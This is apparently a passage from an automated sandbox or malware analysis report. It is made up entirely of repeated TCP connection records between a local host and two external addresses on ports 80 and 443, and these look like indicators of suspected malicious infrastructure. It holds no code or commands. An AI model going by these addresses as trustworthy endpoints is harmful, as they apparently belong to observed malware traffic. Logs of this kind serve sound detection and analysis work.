      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
